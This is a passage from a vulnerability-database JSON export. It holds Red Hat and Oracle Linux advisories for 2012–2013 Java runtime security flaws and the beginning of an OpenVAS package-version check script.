"type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:46:59", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "These packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in OpenJDK did not perform\npermission checks properly. An untrusted Java application or applet could\nuse this flaw to use classes from restricted packages, allowing it to\nbypass Java sandbox restrictions. (CVE-2012-1682)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.10.9. Refer to\nthe NEWS file, linked to in the References, for further information.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "modified": "2017-09-08T12:12:35", "published": "2012-09-03T04:00:00", "id": "RHSA-2012:1222", "href": "https://access.redhat.com/errata/RHSA-2012:1222", "type": "redhat", "title": "(RHSA-2012:1222) Important: java-1.6.0-openjdk security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:09", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682", "CVE-2012-3136", "CVE-2012-4681"], "description": "These packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple improper permission check issues were discovered in the Beans\ncomponent in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-4681,\nCVE-2012-1682, CVE-2012-3136)\n\nA hardening fix was applied to the AWT component in OpenJDK, removing\nfunctionality from the restricted SunToolkit class that was used in\ncombination with other flaws to bypass Java sandbox restrictions.\n(CVE-2012-0547)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:30", "published": "2012-09-03T04:00:00", "id": "RHSA-2012:1223", "href": "https://access.redhat.com/errata/RHSA-2012:1223", "type": "redhat", "title": "(RHSA-2012:1223) Important: java-1.7.0-openjdk security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:34:37", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682", "CVE-2012-3136", "CVE-2012-4681"], "description": "The Oracle Java 7 release includes the Oracle Java 7 Runtime Environment\nand the Oracle Java 7 Software Development Kit.\n\nThis update fixes several vulnerabilities in the Oracle Java 7 Runtime\nEnvironment and the Oracle Java 7 Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Java SE Security\nAlert page, listed in the References section. (CVE-2012-4681,\nCVE-2012-1682, CVE-2012-3136, CVE-2012-0547)\n\nRed Hat is aware that a public exploit for CVE-2012-4681 is available that\nexecutes code without user interaction when a user visits a malicious web\npage using a browser with the Oracle Java 7 web browser plug-in enabled.\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 7 and resolve these issues.\nAll running instances of Oracle Java must be restarted for the update to\ntake effect.\n", "modified": "2018-06-07T09:04:34", "published": "2012-09-04T04:00:00", "id": "RHSA-2012:1225", "href": "https://access.redhat.com/errata/RHSA-2012:1225", "type": "redhat", "title": "(RHSA-2012:1225) Critical: java-1.7.0-oracle security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-0551", "CVE-2012-1682", "CVE-2012-1713", "CVE-2012-1716", "CVE-2012-1717", "CVE-2012-1719", "CVE-2012-1721", "CVE-2012-1722", "CVE-2012-1725", "CVE-2012-1726", "CVE-2012-3136", "CVE-2012-4681"], "description": "IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2012-0547, CVE-2012-0551,\nCVE-2012-1682, CVE-2012-1713, CVE-2012-1716, CVE-2012-1717, CVE-2012-1719,\nCVE-2012-1721, CVE-2012-1722, CVE-2012-1725, CVE-2012-1726, CVE-2012-3136,\nCVE-2012-4681)\n\nAll users of java-1.7.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7 SR2 release. All running instances\nof IBM Java must be restarted for the update to take effect.\n", "modified": "2018-06-07T09:04:21", "published": "2012-09-18T04:00:00", "id": "RHSA-2012:1289", "href": "https://access.redhat.com/errata/RHSA-2012:1289", "type": "redhat", "title": "(RHSA-2012:1289) Critical: java-1.7.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1531", "CVE-2012-1532", "CVE-2012-1533", "CVE-2012-1682", "CVE-2012-3143", "CVE-2012-3159", "CVE-2012-3216", "CVE-2012-4820", "CVE-2012-4822", "CVE-2012-4823", "CVE-2012-5068", "CVE-2012-5069", "CVE-2012-5071", "CVE-2012-5072", "CVE-2012-5073", "CVE-2012-5075", "CVE-2012-5079", "CVE-2012-5081", "CVE-2012-5083", "CVE-2012-5084", "CVE-2012-5089", "CVE-2013-1475"], "description": "IBM Java SE version 6 includes the IBM Java Runtime Environment and the IBM\nJava Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM Security alerts page,\nlisted in the References section. (CVE-2012-0547, CVE-2012-1531,\nCVE-2012-1532, CVE-2012-1533, CVE-2012-1682, CVE-2012-3143, CVE-2012-3159,\nCVE-2012-3216, CVE-2012-4820, CVE-2012-4822, CVE-2012-4823, CVE-2012-5068,\nCVE-2012-5069, CVE-2012-5071, CVE-2012-5072, CVE-2012-5073, CVE-2012-5075,\nCVE-2012-5079, CVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5089)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 6 SR12 release. All running instances\nof IBM Java must be restarted for the update to take effect.\n", "modified": "2018-06-07T09:04:12", "published": "2012-11-15T05:00:00", "id": "RHSA-2012:1466", "href": "https://access.redhat.com/errata/RHSA-2012:1466", "type": "redhat", "title": "(RHSA-2012:1466) Critical: java-1.6.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1531", "CVE-2012-1532", "CVE-2012-1533", "CVE-2012-3143", "CVE-2012-3159", "CVE-2012-3216", "CVE-2012-4416", "CVE-2012-5068", "CVE-2012-5069", "CVE-2012-5071", "CVE-2012-5072", "CVE-2012-5073", "CVE-2012-5075", "CVE-2012-5077", "CVE-2012-5079", "CVE-2012-5081", "CVE-2012-5083", "CVE-2012-5084", "CVE-2012-5085", "CVE-2012-5086", "CVE-2012-5089"], "description": "Oracle Java SE version 6 includes the Oracle Java Runtime Environment and\nthe Oracle Java Software Development Kit.\n\nThis update fixes several vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Java SE Critical\nPatch Update Advisory and Oracle Security Alert pages, listed in the\nReferences section. (CVE-2012-0547, CVE-2012-1531, CVE-2012-1532,\nCVE-2012-1533, CVE-2012-3143, CVE-2012-3159, CVE-2012-3216, CVE-2012-4416,\nCVE-2012-5068, CVE-2012-5069, CVE-2012-5071, CVE-2012-5072, CVE-2012-5073,\nCVE-2012-5075, CVE-2012-5077, CVE-2012-5079, CVE-2012-5081, CVE-2012-5083,\nCVE-2012-5084, CVE-2012-5085, CVE-2012-5086, CVE-2012-5089)\n\nAll users of java-1.6.0-sun are advised to upgrade to these updated\npackages, which provide Oracle Java 6 Update 37. All running instances of\nOracle Java must be restarted for the update to take effect.\n", "modified": "2018-06-07T09:04:37", "published": "2012-10-18T04:00:00", "id": "RHSA-2012:1392", "href": "https://access.redhat.com/errata/RHSA-2012:1392", "type": "redhat", "title": "(RHSA-2012:1392) Critical: java-1.6.0-sun security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-0551", "CVE-2012-1531", "CVE-2012-1532", "CVE-2012-1533", "CVE-2012-1541", "CVE-2012-1682", "CVE-2012-1713", "CVE-2012-1716", "CVE-2012-1717", "CVE-2012-1718", "CVE-2012-1719", "CVE-2012-1721", "CVE-2012-1722", "CVE-2012-1725", "CVE-2012-3143", "CVE-2012-3159", "CVE-2012-3213", "CVE-2012-3216", "CVE-2012-3342", "CVE-2012-4820", "CVE-2012-4822", "CVE-2012-4823", "CVE-2012-5068", "CVE-2012-5069", "CVE-2012-5071", "CVE-2012-5072", "CVE-2012-5073", "CVE-2012-5075", "CVE-2012-5079", "CVE-2012-5081", "CVE-2012-5083", "CVE-2012-5084", "CVE-2012-5089", "CVE-2013-0169", "CVE-2013-0351", "CVE-2013-0401", "CVE-2013-0409", "CVE-2013-0419", "CVE-2013-0423", "CVE-2013-0424", "CVE-2013-0425", "CVE-2013-0426", "CVE-2013-0427", "CVE-2013-0428", "CVE-2013-0432", "CVE-2013-0433", "CVE-2013-0434", "CVE-2013-0435", "CVE-2013-0438", "CVE-2013-0440", "CVE-2013-0441", "CVE-2013-0442", "CVE-2013-0443", "CVE-2013-0445", "CVE-2013-0446", "CVE-2013-0450", "CVE-2013-0809", "CVE-2013-1473", "CVE-2013-1476", "CVE-2013-1478", "CVE-2013-1480", "CVE-2013-1481", "CVE-2013-1486", "CVE-2013-1487", "CVE-2013-1491", "CVE-2013-1493", "CVE-2013-1500", "CVE-2013-1537", "CVE-2013-1540", "CVE-2013-1557", "CVE-2013-1563", "CVE-2013-1569", "CVE-2013-1571", "CVE-2013-2383", "CVE-2013-2384", "CVE-2013-2394", "CVE-2013-2407", "CVE-2013-2412", "CVE-2013-2417", "CVE-2013-2418", "CVE-2013-2419", "CVE-2013-2420", "CVE-2013-2422", "CVE-2013-2424", "CVE-2013-2429", "CVE-2013-2430", "CVE-2013-2432", "CVE-2013-2433", "CVE-2013-2435", "CVE-2013-2437", "CVE-2013-2440", "CVE-2013-2442", "CVE-2013-2443", "CVE-2013-2444", "CVE-2013-2446", "CVE-2013-2447", "CVE-2013-2448", "CVE-2013-2450", "CVE-2013-2451", "CVE-2013-2452", "CVE-2013-2453", "CVE-2013-2454", "CVE-2013-2455", "CVE-2013-2456", "CVE-2013-2457", "CVE-2013-2459", "CVE-2013-2463", "CVE-2013-2464", "CVE-2013-2465", "CVE-2013-2466", "CVE-2013-2468", "CVE-2013-2469", "CVE-2013-2470", "CVE-2013-2471", "CVE-2013-2472", "CVE-2013-2473", "CVE-2013-3743"], "description": "This update corrects several security vulnerabilities in the IBM Java\nRuntime Environment shipped as part of Red Hat Network Satellite Server\n5.5. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets.\n\nSeveral flaws were fixed in the IBM Java 2 Runtime Environment.\n(CVE-2012-0547, CVE-2012-0551, CVE-2012-1531, CVE-2012-1532, CVE-2012-1533,\nCVE-2012-1541, CVE-2012-1682, CVE-2012-1713, CVE-2012-1716, CVE-2012-1717,\nCVE-2012-1718, CVE-2012-1719, CVE-2012-1721, CVE-2012-1722, CVE-2012-1725,\nCVE-2012-3143, CVE-2012-3159, CVE-2012-3213, CVE-2012-3216, CVE-2012-3342,\nCVE-2012-4820, CVE-2012-4822, CVE-2012-4823, CVE-2012-5068, CVE-2012-5069,\nCVE-2012-5071, CVE-2012-5072, CVE-2012-5073, CVE-2012-5075, CVE-2012-5079,\nCVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5089, CVE-2013-0169,\nCVE-2013-0351, CVE-2013-0401, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423,\nCVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428,\nCVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438,\nCVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445,\nCVE-2013-0446, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1476,\nCVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487,\nCVE-2013-1491, CVE-2013-1493, CVE-2013-1500, CVE-2013-1537, CVE-2013-1540,\nCVE-2013-1557, CVE-2013-1563, CVE-2013-1569, CVE-2013-1571, CVE-2013-2383,\nCVE-2013-2384, CVE-2013-2394, CVE-2013-2407, CVE-2013-2412, CVE-2013-2417,\nCVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2424,\nCVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433, CVE-2013-2435,\nCVE-2013-2437, CVE-2013-2440, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444,\nCVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2450, CVE-2013-2451,\nCVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456,\nCVE-2013-2457, CVE-2013-2459, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465,\nCVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,\nCVE-2013-2472, CVE-2013-2473, CVE-2013-3743)\n\nUsers of Red Hat Network Satellite Server 5.5 are advised to upgrade to\nthese updated packages, which contain the IBM Java SE 6 SR14 release. For\nthis update to take effect, Red Hat Network Satellite Server must be\nrestarted (\"/usr/sbin/rhn-satellite restart\"), as well as all running\ninstances of IBM Java.\n", "modified": "2018-06-07T09:02:29", "published": "2013-10-23T04:00:00", "id": "RHSA-2013:1456", "href": "https://access.redhat.com/errata/RHSA-2013:1456", "type": "redhat", "title": "(RHSA-2013:1456) Low: Red Hat Network Satellite server IBM Java Runtime security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:40", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0802", "CVE-2011-0814", "CVE-2011-0862", "CVE-2011-0863", "CVE-2011-0865", "CVE-2011-0867", "CVE-2011-0868", "CVE-2011-0869", "CVE-2011-0871", "CVE-2011-0873", "CVE-2011-3389", "CVE-2011-3516", "CVE-2011-3521", "CVE-2011-3544", "CVE-2011-3545", "CVE-2011-3546", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3550", "CVE-2011-3551", "CVE-2011-3552", "CVE-2011-3553", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3560", "CVE-2011-3561", "CVE-2011-3563", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0498", "CVE-2012-0499", "CVE-2012-0500", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507", "CVE-2012-0547", "CVE-2012-0551", "CVE-2012-1531", "CVE-2012-1532", "CVE-2012-1533", "CVE-2012-1541", "CVE-2012-1682", "CVE-2012-1713", "CVE-2012-1716", "CVE-2012-1717", "CVE-2012-1718", "CVE-2012-1719", "CVE-2012-1721", "CVE-2012-1722", "CVE-2012-1725", "CVE-2012-3143", "CVE-2012-3159", "CVE-2012-3213", "CVE-2012-3216", "CVE-2012-3342", "CVE-2012-4820", "CVE-2012-4822", "CVE-2012-4823", "CVE-2012-5068", "CVE-2012-5069", "CVE-2012-5071", "CVE-2012-5072", "CVE-2012-5073", "CVE-2012-5075", "CVE-2012-5079", "CVE-2012-5081", "CVE-2012-5083", "CVE-2012-5084", "CVE-2012-5089", "CVE-2013-0169", "CVE-2013-0351", "CVE-2013-0401", "CVE-2013-0409", "CVE-2013-0419", "CVE-2013-0423", "CVE-2013-0424", "CVE-2013-0425", "CVE-2013-0426", "CVE-2013-0427", "CVE-2013-0428", "CVE-2013-0432", "CVE-2013-0433", "CVE-2013-0434", "CVE-2013-0435", "CVE-2013-0438", "CVE-2013-0440", "CVE-2013-0441", "CVE-2013-0442", "CVE-2013-0443", "CVE-2013-0445", "CVE-2013-0446", "CVE-2013-0450", "CVE-2013-0809", "CVE-2013-1473", "CVE-2013-1476", "CVE-2013-1478", "CVE-2013-1480", "CVE-2013-1481", "CVE-2013-1486", "CVE-2013-1487", "CVE-2013-1491", "CVE-2013-1493", "CVE-2013-1500", "CVE-2013-1537", "CVE-2013-1540", "CVE-2013-1557", "CVE-2013-1563", "CVE-2013-1569", "CVE-2013-1571", "CVE-2013-2383", "CVE-2013-2384", "CVE-2013-2394", "CVE-2013-2407", "CVE-2013-2412", "CVE-2013-2417", "CVE-2013-2418", "CVE-2013-2419", "CVE-2013-2420", "CVE-2013-2422", "CVE-2013-2424", "CVE-2013-2429", "CVE-2013-2430", "CVE-2013-2432", "CVE-2013-2433", "CVE-2013-2435", "CVE-2013-2437", "CVE-2013-2440", "CVE-2013-2442", "CVE-2013-2443", "CVE-2013-2444", "CVE-2013-2446", "CVE-2013-2447", "CVE-2013-2448", "CVE-2013-2450", "CVE-2013-2451", "CVE-2013-2452", "CVE-2013-2453", "CVE-2013-2454", "CVE-2013-2455", "CVE-2013-2456", "CVE-2013-2457", "CVE-2013-2459", "CVE-2013-2463", "CVE-2013-2464", "CVE-2013-2465", "CVE-2013-2466", "CVE-2013-2468", "CVE-2013-2469", "CVE-2013-2470", "CVE-2013-2471", "CVE-2013-2472", "CVE-2013-2473", "CVE-2013-3743"], "description": "This update corrects several security vulnerabilities in the IBM Java\nRuntime Environment shipped as part of Red Hat Network Satellite Server\n5.4. In a typical operating environment, these are of low security risk as\nthe runtime is not used on untrusted applets.\n\nSeveral flaws were fixed in the IBM Java 2 Runtime Environment.\n(CVE-2011-0802, CVE-2011-0814, CVE-2011-0862, CVE-2011-0863, CVE-2011-0865,\nCVE-2011-0867, CVE-2011-0868, CVE-2011-0869, CVE-2011-0871, CVE-2011-0873,\nCVE-2011-3389, CVE-2011-3516, CVE-2011-3521, CVE-2011-3544, CVE-2011-3545,\nCVE-2011-3546, CVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3550,\nCVE-2011-3551, CVE-2011-3552, CVE-2011-3553, CVE-2011-3554, CVE-2011-3556,\nCVE-2011-3557, CVE-2011-3560, CVE-2011-3561, CVE-2011-3563, CVE-2011-5035,\nCVE-2012-0497, CVE-2012-0498, CVE-2012-0499, CVE-2012-0500, CVE-2012-0501,\nCVE-2012-0502, CVE-2012-0503, CVE-2012-0505, CVE-2012-0506, CVE-2012-0507,\nCVE-2012-0547, CVE-2012-0551, CVE-2012-1531, CVE-2012-1532, CVE-2012-1533,\nCVE-2012-1541, CVE-2012-1682, CVE-2012-1713, CVE-2012-1716, CVE-2012-1717,\nCVE-2012-1718, CVE-2012-1719, CVE-2012-1721, CVE-2012-1722, CVE-2012-1725,\nCVE-2012-3143, CVE-2012-3159, CVE-2012-3213, CVE-2012-3216, CVE-2012-3342,\nCVE-2012-4820, CVE-2012-4822, CVE-2012-4823, CVE-2012-5068, CVE-2012-5069,\nCVE-2012-5071, CVE-2012-5072, CVE-2012-5073, CVE-2012-5075, CVE-2012-5079,\nCVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5089, CVE-2013-0169,\nCVE-2013-0351, CVE-2013-0401, CVE-2013-0409, CVE-2013-0419, CVE-2013-0423,\nCVE-2013-0424, CVE-2013-0425, CVE-2013-0426, CVE-2013-0427, CVE-2013-0428,\nCVE-2013-0432, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438,\nCVE-2013-0440, CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445,\nCVE-2013-0446, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1476,\nCVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1486, CVE-2013-1487,\nCVE-2013-1491, CVE-2013-1493, CVE-2013-1500, CVE-2013-1537, CVE-2013-1540,\nCVE-2013-1557, CVE-2013-1563, CVE-2013-1569, CVE-2013-1571, CVE-2013-2383,\nCVE-2013-2384, CVE-2013-2394, CVE-2013-2407, CVE-2013-2412, CVE-2013-2417,\nCVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2424,\nCVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433, CVE-2013-2435,\nCVE-2013-2437, CVE-2013-2440, CVE-2013-2442, CVE-2013-2443, CVE-2013-2444,\nCVE-2013-2446, CVE-2013-2447, CVE-2013-2448, CVE-2013-2450, CVE-2013-2451,\nCVE-2013-2452, CVE-2013-2453, CVE-2013-2454, CVE-2013-2455, CVE-2013-2456,\nCVE-2013-2457, CVE-2013-2459, CVE-2013-2463, CVE-2013-2464, CVE-2013-2465,\nCVE-2013-2466, CVE-2013-2468, CVE-2013-2469, CVE-2013-2470, CVE-2013-2471,\nCVE-2013-2472, CVE-2013-2473, CVE-2013-3743)\n\nUsers of Red Hat Network Satellite Server 5.4 are advised to upgrade to\nthese updated packages, which contain the IBM Java SE 6 SR14 release. For\nthis update to take effect, Red Hat Network Satellite Server must be\nrestarted (\"/usr/sbin/rhn-satellite restart\"), as well as all running\ninstances of IBM Java.\n", "modified": "2018-06-07T09:02:28", "published": "2013-10-23T04:00:00", "id": "RHSA-2013:1455", "href": "https://access.redhat.com/errata/RHSA-2013:1455", "type": "redhat", "title": "(RHSA-2013:1455) Low: Red Hat Network Satellite server IBM Java Runtime security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "[1:1.6.0.0-1.49.1.11.4]\n- Updated to latest IedTea6 1.11.4\n- Resolves: rhbz#853345\n[1:1.6.0.0-1.48.1.11.3]\n- Access gnome bridge jar is forced to have 644 permissions\n- Resolves: rhbz#828752\n[1:1.6.0.0-1.47.1.11.3]\n- Modified patch3, java-1.6.0-openjdk-java-access-bridge-security.patch:\n - com.sun.org.apache.xerces.internal.utils.,com.sun.org.apache.xalan.internal.utils.\n - packages added also to package.definition\n- Resolves: rhbz#828752\n[1:1.6.0.0-1.46.1.11.3]\n- Updated to IcedTea6 1.11.3\n- Removed upstreamed patch8 - java-1.6.0-openjdk-jirafix_2820_2821.patch\n- Modified patch3, java-1.6.0-openjdk-java-access-bridge-security.patch:\n - com.sun.org.apache.xerces.internal.utils.,com.sun.org.apache.xalan.internal.utils.\n - packages added to patch\n- Resolves: rhbz#828752", "edition": 4, "modified": "2012-09-03T00:00:00", "published": "2012-09-03T00:00:00", "id": "ELSA-2012-1221", "href": "http://linux.oracle.com/errata/ELSA-2012-1221.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "[1.6.0.0-1.28.1.10.9.0.1.el5_8]\n- Add oracle-enterprise.patch\n[1:1.6.0.0-1.28.1.10.9]\n- Updated to latest IcedTea6 1.10.9\n- Resolves: rhbz#846709\n- Resolves: rhbz#853114\n[1:1.6.0.0-1.27.1.10.8]\n- Access gnome bridge jar is forced to have 644 permissions\n- Resolves: rhbz#828749", "edition": 4, "modified": "2012-09-03T00:00:00", "published": "2012-09-03T00:00:00", "id": "ELSA-2012-1222", "href": "http://linux.oracle.com/errata/ELSA-2012-1222.html", "title": "java-1.6.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3136", "CVE-2012-0547", "CVE-2012-4681", "CVE-2012-1682"], "description": "[1.7.0.5-2.2.1.0.1.el6_3.3]\n- Modify DISTRO_NAME for Oracle\n[1.7.0.5-2.2.1.el6.3]\n- Removed patch 304 java-1.7.0-openjdk-beans-isPackageAccessible.patch\n- Applied upstream patches for same issue:\n patch 1001 sec-webrevs-openjdk7-29_aug_2012-7162473.patch\n patch 1002 sec-webrevs-openjdk7-29_aug_2012-7162476.patch\n patch 1003 sec-webrevs-openjdk7-29_aug_2012-7163201.patch\n patch 1004 sec-webrevs-openjdk7-29_aug_2012-7194567.patch\n patch 1005 sec-webrevs-openjdk7-29_aug_2012-78e01a6ca8d3.patch\n- Resolves: rhbz#852299\n[1.7.0.5-2.2.1.1.el6]\n- Added patch 304 java-1.7.0-openjdk-beans-isPackageAccessible.patch\n to fix vulnerability until it is fixed in upstream sources. \n- Resolves: rhbz#852299", "edition": 4, "modified": "2012-09-03T00:00:00", "published": "2012-09-03T00:00:00", "id": "ELSA-2012-1223", "href": "http://linux.oracle.com/errata/ELSA-2012-1223.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "Oracle Linux Local Security Checks ELSA-2012-1221", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123833", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123833", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-1221", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-1221.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123833\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:09:09 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-1221\");\n script_tag(name:\"insight\", value:\"ELSA-2012-1221 - java-1.6.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-1221\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-1221.html\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 